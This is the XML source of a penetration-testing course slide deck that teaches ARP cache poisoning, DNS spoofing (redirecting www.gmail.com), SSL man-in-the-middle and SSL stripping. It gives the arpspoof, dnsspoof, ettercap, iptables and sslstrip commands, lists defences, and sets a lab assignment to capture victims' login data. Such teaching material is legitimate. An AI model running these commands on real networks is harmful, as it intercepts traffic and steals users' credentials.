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74" r:id="rId3"/>
    <p:sldId id="275" r:id="rId4"/>
    <p:sldId id="276" r:id="rId5"/>
    <p:sldId id="277" r:id="rId6"/>
    <p:sldId id="256" r:id="rId7"/>
    <p:sldId id="257" r:id="rId8"/>
    <p:sldId id="263" r:id="rId9"/>
    <p:sldId id="258" r:id="rId10"/>
    <p:sldId id="259" r:id="rId11"/>
    <p:sldId id="260" r:id="rId12"/>
    <p:sldId id="261" r:id="rId13"/>
    <p:sldId id="264" r:id="rId14"/>
    <p:sldId id="262" r:id="rId15"/>
    <p:sldId id="265" r:id="rId16"/>
    <p:sldId id="266" r:id="rId17"/>
    <p:sldId id="270" r:id="rId18"/>
    <p:sldId id="267" r:id="rId19"/>
    <p:sldId id="268" r:id="rId20"/>
    <p:sldId id="271" r:id="rId21"/>
    <p:sldId id="272" r:id="rId22"/>
    <p:sldId id="273" r:id="rId23"/>
    <p:sldId id="269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34" y="-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47" y="0"/>
            <a:ext cx="830953" cy="82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70466" y="2461142"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Weidman</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Ch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>7: Capturing traffic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b="1" dirty="0" smtClean="0"/>
              <a:t>nsider Attack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676192" y="2092326"/>
            <a:ext cx="3977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CSE 3157: Penetration Testing Workshop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35640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DNS Cache Poisoning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Similar to ARP cache poisoning.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>- An attacker sends bogus DNS responses pointing a domain name to the wrong IP.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DNS Spoofing in Kali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Ensure Apache server is running:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:~# service apache2 start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>2. Create a `hosts.txt` file with spoofed DNS entries:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:~# echo "192.168.20.9 www.gmail.com" &gt; hosts.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>3. Run `</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>dnsspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>` to hijack DNS queries:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:~#</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dnsspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -i eth0 -f hosts.txt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Demonstrating the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If successful, `</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>` returns the attacker's IP instead of the real Gmail IP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>georgia@ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:~$ </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> www.gmail.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>- The victim’s browser still shows `www.gmail.com` but connects to the attacker’s server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>- The attacker can clone the actual Gmail website to trick users.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683227"/>
            <a:ext cx="7116762" cy="535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24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DNS spoofing can redirect users to malicious sites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>- To prevent attacks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>  - Use secure DNS protocols like DNSSEC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>  - Encrypt DNS traffic with DoH (DNS over HTTPS) or DoT (DNS over TLS).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>  - Monitor DNS traffic for unusual activity.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SSL Attacks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SSL encrypts communication between a user and a website to protect data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>- Attackers can intercept SSL traffic using man-in-the-middle techniques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>- Users may bypass SSL warnings, exposing their data to attackers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="234995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SSL uses certificates to verify a website’s identity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>- Browsers check if a site’s SSL certificate is trusted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>- If the certificate is invalid, users see a warning message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>- Attackers exploit users who ignore SSL warnings.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="287216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Man in the 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27924"/>
            <a:ext cx="7015163" cy="5281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59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SSL Man-in-the-Middle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1. The attacker intercepts SSL traffic using ARP poisoning.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>2. The user sees an SSL warning but may proceed anyway.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>3. If the user ignores the warning, the attacker can decrypt their traffic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>4. Example attack using </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>Ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> -Ti eth0 -M </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>arp:remote</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> /192.168.20.1/ /192.168.20.11/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92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SSL Stripping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- Attackers remove HTTPS encryption before the traffic reaches the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>- Instead of an SSL warning, users unknowingly send sensitive data over HTTP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>- The attacker captures credentials in plaintext without triggering security alerts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/>
              <a:t>Most users don’t enter https://www.facebook.com or even http://www.facebook.com into their browsers; they type www.facebook .com or sometimes just facebook.com. And that’s why this attack is possible.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88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ARP Cache Poisoning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ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Address Resolution Protocol) maps IP addresses to MAC addresses in a local network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ARP cache poisoning allows an attacker to intercept traffic between a victim and a gateway.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This attack is commonly used for man-in-the-middle (MITM) attacks.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49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Stripping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600200"/>
            <a:ext cx="79724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740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Stripping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need to set an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> rule to pass traffic that is headed to port 80 through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SSLstrip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We’ll run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SSLstrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on port 8080, as shown next, then restart </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and spoof the default gateway. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -A PREROUTING -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --destination-port 80 -j REDIRECT --to-port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SSLstrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and tell it to listen on port 8080 with the -l flag. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sslstrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -l 8080</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4137637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Stripping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Next, browse to a site that uses SSL (try any Internet site that requires login credentials) from your Linux target, like the Twitter login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>you can see, HTTP has replaced HTTPS in the address bar. When you log in, your credentials will be reported in plaintext by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SSLstrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. (No, my Twitter password isn’t really “password.”)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attack is more sophisticated than a straight SSL man-in-the-middle attack.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able to avoid the certificate warning because the server is completing an SSL connection with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SSLstrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> rather than the browser. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Check browser GET/POST)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13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Defending Against SSL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Always verify SSL certificates before proceeding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>- Enable HTTPS Everywhere extensions in browsers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>- Use secure network connections (avoid public Wi-Fi for sensitive transactions).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>- Monitor and log unusual network activity.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="926444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Demonstrate Man-in-the-Middle attack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ARP Cache poisoning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DNS Cache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>poisoning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SSL Attack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Instruction for screenshot / browser logs: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Write your IP, Victim IP, Gateway IP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Show what data transferred from victim IP.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Sow the same data, in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.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For DNS cache poisoning, show that you browse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> from victim IP, but it shows a custom page.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Steal login data from Victim X login by SSL attack </a:t>
            </a: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478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Steps to Perform ARP Cache Poisoning Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Arpspoof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/>
              <a:t>tep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> 1: Enable IP Forwarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Before starting, enable IP forwarding so that packets can be forwarded between the victim and the gateway.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo 1 &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/sys/net/ipv4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip_forward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Step 2: Identify Target and Gateway IP Addresses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ifconfig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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip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 to check your network interface.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arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to find the IP addresses of the target (victim) and the gateway.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5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Steps to Perform ARP Cache Poisoning Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Arpspoof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Step 3: Start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Arpspoof</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open a terminal and execute the following command to poison the ARP cache of the victim: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arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -i eth0 -t [Victim IP] [Gateway IP]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In another terminal, execute the following command to poison the ARP cache of the gateway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -i eth0 -t [Gateway IP] [Victim IP]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9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Steps to Perform ARP Cache Poisoning Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Arpspoof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Step 4: Capture Network Traffic (Optional)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Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to capture the traffic between the victim and the gateway:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -i eth0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Step 5: Restore the Network (Cleanup)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After completing the attack, restore normal ARP functionality by running:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo 0 &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/sys/net/ipv4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip_forward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You can also clear the ARP cache on the victim machine by restarting the network interface or using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -d [IP Address]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44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DNS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Machines need IP addresses to connect to other systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>- Remembering domain names (e.g., www.gmail.com) is easier than memorizing changing IP addresses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>- DNS resolution translates human-readable domain names into IP addresses.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DNS Resolution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The `</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>` command translates a domain name into an IP address.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~# </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> www.gmail.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>- Returns multiple IP addresses for redundancy and reliability.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Resolution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7600" y="2132542"/>
            <a:ext cx="59436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4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DNS Resolution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1. User Enters Domain Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>2. Query Sent to DNS Resolver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>3. Checking Local Cache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>4. Query Sent to Root Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>5. Root Server Response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>6. Query Sent to TLD Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>7. TLD Server Response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>8. Query Sent to Authoritative Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>9. Authoritative Server Response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>10. IP Address Returned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>11. Connection Established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1197</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>122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Weidman Ch 7: Capturing traffic</vt:lpstr>
      <vt:lpstr>Introduction to ARP Cache Poisoning </vt:lpstr>
      <vt:lpstr>Steps to Perform ARP Cache Poisoning Using Arpspoof </vt:lpstr>
      <vt:lpstr>Steps to Perform ARP Cache Poisoning Using Arpspoof </vt:lpstr>
      <vt:lpstr>Steps to Perform ARP Cache Poisoning Using Arpspoof </vt:lpstr>
      <vt:lpstr>How DNS Works?</vt:lpstr>
      <vt:lpstr>DNS Resolution Example</vt:lpstr>
      <vt:lpstr>DNS Resolution Example</vt:lpstr>
      <vt:lpstr>DNS Resolution Process</vt:lpstr>
      <vt:lpstr>DNS Cache Poisoning Attack</vt:lpstr>
      <vt:lpstr>Setting Up DNS Spoofing in Kali</vt:lpstr>
      <vt:lpstr>Demonstrating the Attack</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>DNS SUMMARY</vt:lpstr>
      <vt:lpstr>SSL Attacks Overview</vt:lpstr>
      <vt:lpstr>SSL Basics</vt:lpstr>
      <vt:lpstr>SSL Man in the Middle</vt:lpstr>
      <vt:lpstr>SSL Man-in-the-Middle Attack</vt:lpstr>
      <vt:lpstr>SSL Stripping Attack</vt:lpstr>
      <vt:lpstr>SSL Stripping Attack</vt:lpstr>
      <vt:lpstr>SSL Stripping Attack</vt:lpstr>
      <vt:lpstr>SSL Stripping Attack</vt:lpstr>
      <vt:lpstr>Defending Against SSL Attacks</vt:lpstr>
      <vt:lpstr>Assignment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DNS Works?</dc:title>
  <dc:subject/>
  <dc:creator/>
  <cp:keywords/>
  <dc:description>generated using python-pptx</dc:description>
  <cp:lastModifiedBy>WINDOWS</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-01-27T09:14:16Z</dcterms:created>
